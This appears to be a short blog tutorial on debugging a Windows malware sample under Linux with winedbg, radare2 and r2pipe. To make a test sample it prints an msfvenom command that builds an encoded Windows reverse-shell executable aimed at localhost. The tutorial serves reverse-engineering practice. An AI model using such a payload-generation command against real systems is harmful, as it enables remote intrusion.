Dynamic win32 malware analysis on Linux

Sometimes we don’t have a Windows machine for analyzing a malware sample. If the sample is very simple and is not interacting much with the operating system, we can use Linux.

First we will create a pretty simple PE file using metasploit, this will create a reverse shell on 31337 port at localhost. :

msfvenom -a x86 --platform windows -p windows/shell/reverse\_tcp \\
LHOST=127.0.0.1 LPORT=31337 -b "\\x00" -e x86/shikata\_ga\_nai -f exe -o /tmp/1.exe

Now we have a sample we will use wine debugger pausing the sample:

winedbg --gdb --no-start /tmp/1.exe

Pretty simple, right? We can now connect to to the gdb socker using gdb, but in our case we will use radare2:

r2 -d -a x86 -b 32 gdb://localhost:55193

Now we have a radare2 session, but we can automate our analysis using r2pipe and your favorite language, in my case python. Just remember to use json ”cmdj” output in your commands so it will be easy to parse.

import r2pipe
r2 = r2pipe.open ('gdb://127.0.0.1:55193',
                     \['-d', '-a x86', '-b 32',
                      '-e dbg.exe.path=/tmp/1,exe'\])

r2.cmd("aaa")
function\_list = r2.cmdj("aflj")
# ...
# ...

 

Happy malware reversing!!